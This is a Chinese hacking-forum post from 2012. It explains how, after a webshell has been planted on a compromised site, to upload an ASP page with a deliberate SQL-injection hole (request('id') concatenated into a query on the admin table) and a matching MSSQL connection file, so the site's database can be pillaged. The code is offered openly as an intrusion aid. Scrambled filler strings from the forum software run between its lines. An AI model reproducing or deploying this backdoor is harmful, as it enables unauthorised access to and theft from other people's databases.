中国网络渗透测试联盟
标题:
自己构造注入点方便入侵
[打印本页]
作者:
admin
时间:
2012-9-13 17:27
标题:
自己构造注入点方便入侵
自己构造注入点方便入侵
' F, d* q+ `) D/ o3 c
$ c# S( ]) O: O% X
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
* Y9 `, H% X6 C( u" G( t
! v: j2 n) Q3 X* Z
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
! G- O9 L1 G/ J. n, b4 O8 \/ _
3 {8 n% F7 o! l% o- h7 Y* a
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
& |% w; i4 e4 {( i# h, g2 N6 M
, M+ _2 x; G4 ^* s/ N Y1 h; b2 O2 L
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
/ V5 M" l/ ]* Q5 L" i. z
. k) X" T5 F) t: U
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
7 A$ N7 U! W& c4 t( v0 h; V' Y
1 u; V9 Z3 ]. u
程序代码
, @# j" ^/ u1 Y2 d* A, K' l
<!--#include file="xx.asp"-->
- k. E! L+ {7 \. W" u, b. f
<%
+ K- O% E: H* ?: I; X/ t% S) s1 `( F
set rs=server.createobject("ADODB.recordset")
: d+ _0 B1 g5 h- p# I ]6 B o" u( Y
id = request("id")
0 E6 c M L4 h) R
strSQL = "select * from admin where id=" & id
. d- J: ~- v0 n2 t- t; \$ h% Y
rs.open strSQL,conn,1,3
* k5 h4 u9 ]- h
rs.close
* p3 _8 j8 O$ k u5 k
%>
( ^! W2 @5 P: N( @
+ V% Y/ G$ L1 `2 d0 B
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
3 Z2 M ~9 m: `
+ y, q/ e1 I/ d
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
% ~6 r& g, }! Z" {
9 u% `# q( G7 c$ z8 P& }1 e
然后就要构造一个连接数据库的文件了,代码如下:
( d# x V0 N. c8 u2 ^) w, x
程序代码
* D+ {3 S% {, n% Y0 v3 G
<%
+ c, O3 D7 ?1 e7 O2 L# \% k
strSQLServerName = "000.000.000.000" '服务器名称或地址
( B3 J y7 o5 Q6 N. |# I9 p# X
strSQLDBUserName = "sqlname" '数据库帐号
0 k2 b) I4 ~: e- y% q7 a
strSQLDBPassword = "sqlpass" '数据库密码
2 Z; g- d& N9 [- z. [
strSQLDBName = "sqldataname" '数据库名称
- y* y4 F9 h, W/ H
Set conn = Server.CreateObject("ADODB.Connection")
' m# o9 c6 A$ y1 f4 G* J
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
8 ~, _! h. x8 H- W4 w: s
conn.open strCon
( ?" ~: }* [7 S
%>
0 m; \, q6 F0 A$ b, W2 f
/ B8 F/ V$ ^$ M7 T9 R! v" j2 ^7 H* ]
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
% u- [ E( j" h; k$ j9 F, ^! U
9 H# u2 i' b) E \% Z3 Q! A
就这样,正常情况下,就OK了,伪造成功……
3 Y2 f7 x& o/ h. |* y. P% n
( {1 T- M/ Z; o! B
如果有什么问题可以提出来大家一起探讨解决。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2